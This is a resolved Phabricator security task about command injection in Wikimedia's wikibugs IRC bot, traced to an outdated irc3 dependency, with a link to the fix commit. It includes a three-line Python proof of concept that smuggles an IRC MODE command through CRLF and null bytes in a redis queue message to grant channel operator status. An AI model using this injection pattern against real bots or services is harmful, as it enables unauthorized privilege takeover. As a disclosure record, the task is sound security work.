Page MenuHomePhabricator
Create Task
Maniphest T283283

Command injection in wikibugs because of outdated irc3 dependency
Closed, ResolvedPublicSecurity
Actions

Description

If you know the redis channel name, you can do arbitrary command injection with wikibugs. We reported this upstream (https://github.com/gawel/irc3/issues/34) but never actually updated our copy of irc3, oops. Upgrading might also fix the SSL/TLS issue on Libera.

We're going to fix this after we've finished exploiting it to register channels that wikibugs is opped in.

Discovered by @valhallasw after I asked him to find a backdoor into wikibugs :-)

>>> import rqueue
>>> r = rqueue.RedisQueue('<secret>', 'tools-redis')
>>> r.put({'raw': True, 'msg': 'opperdepop\x00\r\nMODE #wikimedia-perf-bots +o legoktm\r\n', 'channels': ['#wikimedia-perf-bots']})

Details

SubjectRepoBranchLines +/-
Upgrade irc3 dependency, connect over TLS, auth over SASLlabs/tools/wikibugs2master+16 -14
Customize query in gerrit
Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL